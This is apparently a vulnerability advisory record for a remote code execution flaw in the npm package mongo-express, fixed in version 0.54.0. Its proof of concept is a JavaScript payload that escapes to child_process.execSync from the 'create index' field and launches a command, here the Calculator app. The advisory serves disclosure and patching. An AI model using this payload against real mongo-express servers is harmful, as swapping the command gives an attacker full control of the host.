OSV: GHSA-H47J-HC6X-H3QQ
History: Dec 30, 2019 - 7:30 p.m.

Remote Code Execution Vulnerability in NPM mongo-express

2019-12-30 19:30:31
Google
osv.dev

AI Score: 9.4 High (Confidence: High)

EPSS: 0.975 High (Percentile: 100.0%)

Impact

Remote code execution on the host machine by any authenticated user.

Proof Of Concept

Launch mongo-express on a Mac and paste the following into the “create index” field; doing so will pop open the Mac calculator:

this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

Patches

Users should upgrade to version 0.54.0.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Snyk Security Advisory
CVE

For more information

If you have any questions or comments about this advisory:

Thanks

@JLLeitschuh for finding and reporting this vulnerability

CPE Name        Operator    Version
mongo-express   lt          0.54.0
